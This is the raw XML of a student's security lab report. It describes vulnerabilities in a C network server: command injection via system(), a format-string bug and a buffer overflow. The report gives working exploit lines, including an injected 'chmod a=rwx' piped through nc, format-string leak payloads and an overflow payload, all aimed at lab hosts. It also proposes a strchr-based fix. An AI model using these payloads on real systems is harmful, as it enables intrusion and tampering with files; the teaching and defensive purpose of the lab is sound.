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5FC521" w14:textId="2675DD50" w:rsidR="000304F0" w:rsidRPr="006073FC" w:rsidRDefault="000304F0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783A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Task1</w:t>
      </w:r>
      <w:r w:rsidR="006073FC" w:rsidRPr="00F1783A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6073FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00896BDF" w:rsidRPr="00896BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Program version: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719A9278" w14:textId="7659C76F" w:rsidR="000304F0" w:rsidRPr="0085533B" w:rsidRDefault="00896BDF" w:rsidP="00802AF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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12251E0C" w14:textId="352A3BB7" w:rsidR="000304F0" w:rsidRDefault="000304F0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</w:t>
      </w:r>
      <w:r w:rsidR="00896BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">copying the code in listing-1 into a c file and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00BF2BBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidR="00896BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided in week 7 lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, I find that in these lines there are vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00BF2BB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0304F0" w14:paraId="243FF8FC" w14:textId="77777777" w:rsidTr="00030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739FEAA" w14:textId="04DCC038" w:rsidR="000304F0" w:rsidRDefault="00896BDF" w:rsidP="00802AF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0304F0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56EB8451" w14:textId="46907F81" w:rsidR="000304F0" w:rsidRDefault="000304F0" w:rsidP="00802AF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Vulnerability </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000304F0" w14:paraId="5EAA56D0" w14:textId="77777777" w:rsidTr="0003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958BE36" w14:textId="77777777" w:rsidR="000304F0" w:rsidRPr="000304F0" w:rsidRDefault="000304F0" w:rsidP="00802AF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char command[300</w:t>
            </w:r>
            <w:proofErr w:type="gram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];</w:t>
            </w:r>
            <w:proofErr w:type="gram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   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="453FA20E" w14:textId="728BF543" w:rsidR="000304F0" w:rsidRPr="000304F0" w:rsidRDefault="000304F0" w:rsidP="00802AF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char </w:t>
            </w:r>
            <w:proofErr w:type="spell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buf</w:t>
            </w:r>
            <w:proofErr w:type="spell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[1500];</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3538CA01" w14:textId="3268AD1D" w:rsidR="000304F0" w:rsidRPr="000304F0" w:rsidRDefault="000304F0" w:rsidP="00802AF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304F0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>fixed size local buffer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000304F0" w14:paraId="37C627CC" w14:textId="77777777" w:rsidTr="00030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D14A38" w14:textId="4087A3AB" w:rsidR="000304F0" w:rsidRPr="000304F0" w:rsidRDefault="000304F0" w:rsidP="00802AF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sprintf</w:t>
            </w:r>
            <w:proofErr w:type="spell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(command, "/</w:t>
            </w:r>
            <w:proofErr w:type="spell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usr</w:t>
            </w:r>
            <w:proofErr w:type="spell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/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spell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nslookup</w:t>
            </w:r>
            <w:proofErr w:type="spell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%s", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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buf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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);</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43192C52" w14:textId="07368940" w:rsidR="000304F0" w:rsidRPr="000304F0" w:rsidRDefault="000304F0" w:rsidP="00802AF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string vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000304F0" w14:paraId="3AF2C7D9" w14:textId="77777777" w:rsidTr="00030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F18710" w14:textId="13F81971" w:rsidR="000304F0" w:rsidRPr="000304F0" w:rsidRDefault="000304F0" w:rsidP="00802AF2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304F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system(command);</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17D7555E" w14:textId="413BFD44" w:rsidR="000304F0" w:rsidRPr="000304F0" w:rsidRDefault="00BF2BBE" w:rsidP="00802AF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injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2976A62F" w14:textId="21DB5FCE" w:rsidR="00BF2BBE" w:rsidRDefault="00BF2BBE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we must analyse these vulnerabilities to see if they can be used to attack. </w:t>
      </w:r>
      <w:r w:rsidR="00896BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">I originally generate a BOF and a FSV attack to the host server, but the stack crashing is detected, then server terminates. </w:t>
      </w:r>
      <w:r w:rsidR="00C76B6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="00896BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I have to try the last one: command injection. Thankfully, the input is directly called by the system</w:t>
      </w:r>
      <w:r w:rsidR="00C76B6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00896BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5379B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thus,</w:t>
      </w:r>
      <w:r w:rsidR="00C76B6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I can use the 2</w:t>
      </w:r>
      <w:r w:rsidR="00C76B6A" w:rsidRPr="00C76B6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76B6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument to execute my command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E102175" w14:textId="52AE2FE2" w:rsidR="00BF2BBE" w:rsidRPr="0085533B" w:rsidRDefault="00896BDF" w:rsidP="00802AF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A59D1"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Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA8609" w14:textId="6F7ABED3" w:rsidR="00C76B6A" w:rsidRDefault="003A59D1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6B6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem version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6B6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3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C76B6A" w:rsidRPr="00C76B6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>change the privilege level to read, write and execute for all files in the folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F2DF2" w14:textId="7865ACFA" w:rsidR="00C76B6A" w:rsidRPr="00C76B6A" w:rsidRDefault="00C76B6A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Command injection: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385AD0EB" w14:textId="2F3C6608" w:rsidR="006073FC" w:rsidRPr="00FE2172" w:rsidRDefault="00C76B6A" w:rsidP="00802AF2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echo "hackthebox.com; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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a=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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rwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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~/hidden" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="00AC0897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1</w:t>
      </w:r>
      <w:r w:rsidR="00C162C1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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE217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7070</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F3FDE4" w14:textId="310BB53D" w:rsidR="00C76B6A" w:rsidRDefault="00C76B6A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2934B7F5" w14:textId="5B0A0334" w:rsidR="00C76B6A" w:rsidRDefault="00C76B6A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6B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5624C" wp14:editId="56D8ED07">
            <wp:extent cx="3225966" cy="2082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BDAE" w14:textId="383BFD4C" w:rsidR="00C76B6A" w:rsidRPr="0085533B" w:rsidRDefault="00C76B6A" w:rsidP="00802AF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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r w:rsidR="003A59D1" w:rsidRPr="0085533B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ing the </w:t>
      </w:r>
      <w:r w:rsidR="00C679E9" w:rsidRPr="0085533B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7257EFA9" w14:textId="77777777" w:rsidR="00C90FA1" w:rsidRDefault="00C1199A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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>efe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rence: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A5B857" w14:textId="53AEA977" w:rsidR="00A5379B" w:rsidRDefault="00832509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C90FA1" w:rsidRPr="00855F87">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/Command_Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C11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81ACF" w14:textId="2F4DBF07" w:rsidR="00C90FA1" w:rsidRDefault="00832509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C90FA1" w:rsidRPr="00855F87">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.cplusplus.com/reference/cstring/strchr/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C90F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64D0D" w14:textId="21E5C745" w:rsidR="006073FC" w:rsidRDefault="006073FC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we use “;” to be the header of the 2</w:t>
      </w:r>
      <w:r w:rsidRPr="006073F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command thus to attack, we can counter this attack by a validation check. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We’ll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strchr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>() to check if there’s another command that is sent to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A77DD" w14:textId="241F4F64" w:rsidR="00813843" w:rsidRDefault="00813843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shall change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() to system(command) as below:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="_MON_1664119678"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="3B97CA8B" w14:textId="351BB1FE" w:rsidR="0085533B" w:rsidRPr="0085533B" w:rsidRDefault="00F1147F" w:rsidP="008553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360" w:dyaOrig="2598" w14:anchorId="7264B9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30pt" o:ole="">
            <v:imagedata r:id="rId11" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Word.OpenDocumentText.12" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1672771203" r:id="rId12"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB2983" w14:textId="1906BFC1" w:rsidR="00C90FA1" w:rsidRDefault="006073FC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783A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Task1.2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73FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server ver3 &amp; port 6063</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D3D65" w14:textId="3FB990F3" w:rsidR="000A6473" w:rsidRPr="0085533B" w:rsidRDefault="00E2137E" w:rsidP="00A924A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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37A5CA" w14:textId="6000D85C" w:rsidR="00C1199A" w:rsidRDefault="00B63399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Vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EEE820" w14:textId="33AC3483" w:rsidR="00B63399" w:rsidRDefault="00B63399" w:rsidP="00A924A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28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Format string vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6339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myprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B63399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239981C3" w14:textId="4B7942A3" w:rsidR="00B63399" w:rsidRPr="00B63399" w:rsidRDefault="00B63399" w:rsidP="00802AF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28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>BOF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B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">char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password_buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[BUF_SIZE];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strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B63399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password_buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, password</w:t>
      </w:r>
      <w:proofErr w:type="gram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)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63399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2315391" w14:textId="5C703E2F" w:rsidR="00B63399" w:rsidRPr="00A5379B" w:rsidRDefault="00B63399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3828">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step1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91414">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">echo to server will call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>check_authentication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>char * username</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, char * password)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63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"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="001C3381">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ill accept </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C3381" w:rsidRPr="00B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>myprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C3381" w:rsidRPr="00B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="001C3381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="001C3381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e</w:t>
      </w:r>
      <w:r w:rsidR="001C33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use FSV in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myprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="001C3381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14:paraId="01757272" w14:textId="4EF0DA95" w:rsidR="003A59D1" w:rsidRDefault="00526023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requires lots of attempts, but finally we got:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18048EA6" w14:textId="1491D565" w:rsidR="00C162C1" w:rsidRPr="00C162C1" w:rsidRDefault="00802AF2" w:rsidP="00802AF2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echo $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-e 'print "%.8x."x7, "%s"') pw123 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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10.0.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00C162C1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4</w:t>
      </w:r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6063</w:t>
      </w:r>
      <w:r w:rsidR="00C162C1" w:rsidRPr="00C162C1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C162C1" w:rsidRPr="00C162C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74710CDA" wp14:editId="55E21B62">
            <wp:extent cx="5943600" cy="140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7E92" w14:textId="0855EA66" w:rsidR="00526023" w:rsidRPr="00802AF2" w:rsidRDefault="00526023" w:rsidP="00802AF2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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echo $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-e 'print "%.8x."x8, "%s"') pw123 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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10.0.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00C162C1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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00802AF2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6063</w:t>
      </w:r>
      <w:r w:rsidR="00AC0897" w:rsidRPr="00AC0897">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C162C1" w:rsidRPr="00C162C1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="630E0D70" wp14:editId="1C313E29">
            <wp:extent cx="5943600" cy="115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8798" w14:textId="6AAE7979" w:rsidR="00802AF2" w:rsidRDefault="00802AF2" w:rsidP="00802AF2">
      <w:pPr>
        <w:spacing w:line="36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password_buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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address </w:t>
      </w:r>
      <w:r w:rsidR="00C162C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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162C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00C162C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 8</w:t>
      </w:r>
      <w:r w:rsidR="00C162C1" w:rsidRPr="00C162C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00C162C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position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4918E7AE" w14:textId="660A09ED" w:rsidR="00C162C1" w:rsidRPr="00C162C1" w:rsidRDefault="00C162C1" w:rsidP="00802A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do not need 0xbfffc80 because this address will change when we change password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA92BD" w14:textId="3BD8A202" w:rsidR="00C162C1" w:rsidRPr="00C162C1" w:rsidRDefault="00802AF2" w:rsidP="00802AF2">
      <w:pPr>
        <w:spacing w:line="36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80382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Step2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803828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BOF in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B63399">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="05340C9F" w14:textId="125206DB" w:rsidR="00C64440" w:rsidRDefault="00C64440" w:rsidP="00802AF2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="F2F2F2" w:themeColor="background1" w:themeShade="F2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr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123 $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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"A"x119') | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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</w:t>
      </w:r>
      <w:r w:rsidR="002A527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4</w:t>
      </w:r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6063</w:t>
      </w:r>
    </w:p>
